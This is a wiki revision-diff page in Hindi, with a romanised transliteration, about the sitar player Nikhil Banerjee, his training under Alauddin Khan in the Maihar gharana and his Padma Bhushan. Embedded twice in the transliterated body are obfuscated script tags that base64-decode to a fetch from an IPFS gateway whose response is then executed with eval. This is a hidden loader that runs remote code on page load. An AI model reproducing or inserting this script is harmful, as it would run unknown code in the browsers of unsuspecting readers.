Difference between revisions of "निखिल बैनर्जी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " सदी " to " सदी ")
Line 1: Line 1:
 
[[चित्र:Nikhil Banerjee.jpg|thumb|निखिल बैनर्जी <br />Nikhil Banerjee]]
 
[[चित्र:Nikhil Banerjee.jpg|thumb|निखिल बैनर्जी <br />Nikhil Banerjee]]
 
*'''निखिल रंजन बैनर्जी''' का जन्म [[14 अक्टूबर]], [[1931]] में [[पश्चिम बंगाल]] राज्य के एक ब्राह्मण घराने में हुआ था।  
 
*'''निखिल रंजन बैनर्जी''' का जन्म [[14 अक्टूबर]], [[1931]] में [[पश्चिम बंगाल]] राज्य के एक ब्राह्मण घराने में हुआ था।  
*निखिल रंजन बैनर्जी 20वीं सदी में [[भारत]] के प्रमुख [[सितार]] वादकों में से एक थे।  
+
*निखिल रंजन बैनर्जी 20वीं [[सदी]] में [[भारत]] के प्रमुख [[सितार]] वादकों में से एक थे।  
 
==आरंभिक जीवन==
 
==आरंभिक जीवन==
 
निखिल रंजन बैनर्जी को सितार बजाना इनके पिता जितेन्द्रनाथ बैनर्जी ने सिखाया। सितार बजाने की उनमें बचपन से ही विलक्षण प्रतिभा थी। निखिल रंजन बैनर्जी ने नौ साल की उम्र में अखिल भारतीय सितार प्रतियोगिता जीती और जल्द ही ऑल इंडिया रेडियो पर सितार बजाने लगे। शुरुआती प्रशिक्षण के लिए जितेन्द्रनाथ के अनुरोध पर मुश्ताक़ अली ख़ाँ ने निखिल बैनर्जी को अपना शिष्य बनाया। निखिल बैनर्जी [[उस्ताद अलाउद्दीन ख़ाँ]] से शिक्षा प्राप्त करना चाहते थे, लेकिन अलाउद्दीन ख़ाँ और शिष्य नहीं चाहते थे। अन्त में रेडियो पर निखिल बैनर्जी का सितार वादन सुनने पर अलाउद्दीन ख़ाँ ने अपना निर्णय बदला। मुख्यत: निखिल बैनर्जी उस्ताद अलाउद्दीन ख़ाँ के शिष्य थे, लेकिन उन्होंने [[अली अकबर ख़ाँ]] से भी शिक्षा प्राप्त की।
 
निखिल रंजन बैनर्जी को सितार बजाना इनके पिता जितेन्द्रनाथ बैनर्जी ने सिखाया। सितार बजाने की उनमें बचपन से ही विलक्षण प्रतिभा थी। निखिल रंजन बैनर्जी ने नौ साल की उम्र में अखिल भारतीय सितार प्रतियोगिता जीती और जल्द ही ऑल इंडिया रेडियो पर सितार बजाने लगे। शुरुआती प्रशिक्षण के लिए जितेन्द्रनाथ के अनुरोध पर मुश्ताक़ अली ख़ाँ ने निखिल बैनर्जी को अपना शिष्य बनाया। निखिल बैनर्जी [[उस्ताद अलाउद्दीन ख़ाँ]] से शिक्षा प्राप्त करना चाहते थे, लेकिन अलाउद्दीन ख़ाँ और शिष्य नहीं चाहते थे। अन्त में रेडियो पर निखिल बैनर्जी का सितार वादन सुनने पर अलाउद्दीन ख़ाँ ने अपना निर्णय बदला। मुख्यत: निखिल बैनर्जी उस्ताद अलाउद्दीन ख़ाँ के शिष्य थे, लेकिन उन्होंने [[अली अकबर ख़ाँ]] से भी शिक्षा प्राप्त की।

Revision as of 10:58, 3 October 2011

thumb|nikhil bainarji
Nikhil Banerjee

aranbhik jivan

nikhil ranjan bainarji ko sitar bajana inake pita jitendranath bainarji ne sikhaya. sitar bajane ki unamean bachapan se hi vilakshan pratibha thi. nikhil ranjan bainarji ne nau sal ki umr mean akhil bharatiy sitar pratiyogita jiti aur jald hi aaul iandiya rediyo par sitar bajane lage. shuruati prashikshan ke lie jitendranath ke anurodh par mushtaq ali khaan ne nikhil bainarji ko apana shishy banaya. nikhil bainarji ustad alauddin khaan se shiksha prapt karana chahate the, lekin alauddin khaan aur shishy nahian chahate the. ant mean rediyo par nikhil bainarji ka sitar vadan sunane par alauddin khaan ne apana nirnay badala. mukhyat: nikhil bainarji ustad alauddin khaan ke shishy the, lekin unhoanne ali akabar khaan se bhi shiksha prapt ki.

maihar gharana

maihar gharane ka kathor anushasan tha. saloan tak nikhil bainarji ne prat: char baje se rat ke gyarah baje tak riyaz kiya. nikhil bainarji ke atirikt ustad alauddin khaan ke shishyoan mean unake putr ali akabar khaan, pautr ashish khaan, bhatije bahadur khaan (sarod), ravi shankar (sitar), putri annapoorna (surabahar), pannalal ghosh (baansuri) aur basant ray (sarod) bhi the. ustad alauddin khaan ne apane shishyoan ko vadan paddhati ke sath maihar gharane ke drishtikon se bhi parichit karaya.

samman

nikhil ranjan bainarji ko 1987 mean bharat sarakar ne kala ke kshetr mean padm bhooshan se sammanit kiya tha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh